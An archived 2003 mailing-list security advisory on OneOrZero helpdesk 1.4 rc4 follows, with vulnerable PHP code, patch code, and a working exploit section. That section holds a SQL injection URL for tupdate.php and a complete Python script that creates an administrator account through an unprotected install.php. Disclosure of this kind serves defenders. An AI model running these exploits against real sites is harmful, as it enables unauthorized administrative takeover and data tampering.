[VulnWatch] OneOrZero Security Problems (PHP)

From: Frog Man (leseulfrog_at_hotmail.com)
Date: 05/15/03

  • Next message: Cisco Systems Product Security Incident Response Team: "[VulnWatch] Cisco Security Advisory: Cisco IOS Software Processing of SAA Packets"
    To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
    Date: Thu, 15 May 2003 19:06:40 +0200
    
    

    Informations :
    같같같같같같같
    Website : http://www.oneorzero.com
    Version : 1.4 rc4
    Problems :
    - SQL Injection
    - Admin Access

    PHP Code/Location :
    같같같같같같같같같

    supporter/tupdate.php :

    --------------------------------------------------------------------------
    if($groupid == 'change'){
            $sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
            $result = $db->query($sql);
    }
    --------------------------------------------------------------------------

    admin/install.php :

    ----------------------------------------------------------------------------------------------------------------------------

    [...]
    if($step == 2){

            echo "<br><br>";
            start("Helpdesk Installation", "center");
                    if($HTTP_POST_VARS['first'] == ''){
                            showError("first name");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['last'] == ''){
                            showError("last name");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['user'] == ''){
                            showError("user name");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['email'] == ''){
                            showError("email address");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
                            showError("password");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['office'] == ''){
                            showError("office");
                            $flag = 1;
                    }

                    if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
                            showError("password");
                            $flag = 1;
                    }

                    if(!validEmail($HTTP_POST_VARS['email'])){
                            showError("email");
                            $flag = 1;
                    }

            if($flag == 1){
                    endit();
                    exit;
            }
    [...]
            $pwd = md5($HTTP_POST_VARS['pwd1']);
            $query = "INSERT IGNORE into $mysql_users_table VALUES(NULL,
    '".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."',
    '".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '',
    '".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."',
    1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
            $db->query($query);
    [...]

    ----------------------------------------------------------------------------------------------------------------------------

    Exploits :
    같같같같
    -
    http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
    will change the description of the ticket number 10 into "abcd"
    (char(97,98,99,100))

    - To exploit the second one, in python 2.2 :

    --------------------------------------------------------------------------------------------------------------------------
    import urlparse
    import httplib
    import string

    OneOrZero("http://www.target.com","80","NewUserName","NewPassword")

    class OneOrZero:
        def __init__(self,target,port,user,password):
            if port != "":
                self.port=str(port)
            else :
                self.port="80"
            self.path=str(urlparse.urlparse(target)[2])
            self.target=str(urlparse.urlparse(target)[1])
            self.user=str(user)
            self.password=str(password)
            self.USER_AGENT='OneOrZero.py'
            self.CreateAdminAccount()

        def CreateAdminAccount(self):

            
    data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd'

            try :
                print "Connecting On "+self.target+"...\n"

                http=httplib.HTTP(self.target,self.port)

                print "Sending Data On "+self.target+"...\n"

                http.putrequest("POST",self.path+"/admin/install.php")
                
    http.putheader("Content-Type","application/x-www-form-urlencoded")
                http.putheader("User-Agent",self.USER_AGENT)
                http.putheader("Host",self.target)
                http.putheader("Content-Length",str(len(data)))
                http.endheaders()

                http.send(data)

                code,msg,headers = http.getreply()

                print "HTTP Code : ",str(code)
                print "HTTP Connection : ",msg
                print "HTTP headers : \n",headers,"\n"

                file=http.getfile()
                if string.find(file.read(),"Administrator Account Created
    Successfully.") != -1:
                    print "Congratulations, Administrator Account Created
    Successfully."
                    print "You Can Log In Here :
    http://"+self.target+self.path+"/admin/control.php"
                    print "User : ",self.user
                    print "Password : ",self.password
                else :
                    print "Administrator Account Hasn't Been Created."

            except :
                print "Error During Admin Account Creation."
    --------------------------------------------------------------------------------------------------------------------------

    You just have to change the line :
    OneOrZero("http://www.target.com","80","NewUserName","NewPassword")

    Solution :
    같같같같
    A patch (and more details in French) can be found on
    http://www.phpsecure.info.

    - In supporter/tupdate.php, add the lines (at the begin) :

    -------------------------------------------------------------------------------------------------
    foreach ($_REQUEST as $key=>$value) {

        if (get_magic_quotes_gpc()==0) {
            $value = addslashes($value); // This will reproduce the option
    magic_quotes_gpc=1
        }

        $value = str_replace('(','()',$value);

        ${$key} = $value;
        $_REQUEST[$key] = $value;
        if (isset($_POST[$key])) { $_POST[$key] = $value; }
        if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
        if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
        if (isset($_GET[$key])) { $_GET[$key] = $value; }
        if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
        if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value;
    }
        if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
        if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
    }
    -------------------------------------------------------------------------------------------------

    - In admin/install.php, put the lines :

    ---------------------------------------------------------------
            $sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
            $result = $db->query($sql);
            $num_rows = $db->num_rows($result);
            if ($num_rows > 0){
                    die("<b>OneOrZero Is Already Installed.</b>");
            }
    ---------------------------------------------------------------

    just after :

    ---------------
    if($step == 2){
    ---------------

    frog-m@n

    _________________________________________________________________
    Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail


  • Next message: Cisco Systems Product Security Incident Response Team: "[VulnWatch] Cisco Security Advisory: Cisco IOS Software Processing of SAA Packets"

    Relevant Pages

    • OneOrZero Security Problems (PHP)
      ... Version: 1.4 rc4 ... SQL Injection ... Admin Access ... PHP Code/Location: ...
      (Bugtraq)
    • MyPHPLinks (PHP) : SQL Injection
      ... SQL Injection -> Admin access ... PHP Code/Location: ... $MyPHPLinksPass); ... session='".$idsession."' and timesession> now")) ...
      (Bugtraq)
    • PHPMyPub (PHP)
      ... Website: http://phpmypub.free.fr ... Problem: Admin access ... PHP Code/Location: ... if ($formulaire) ...
      (Bugtraq)
    • phpPass (PHP)
      ... Website: http://www.agames-net.com ... Problem: SQL Injection ... PHP Code/Location: ...
      (Bugtraq)
    • [VulnWatch] PHP-Nuke : banners.php
      ... Problem: SQL Injection ... Config: ... PHP Code/Location: ... This will save crypted password into http:///banners2.txt: ...
      (VulnWatch)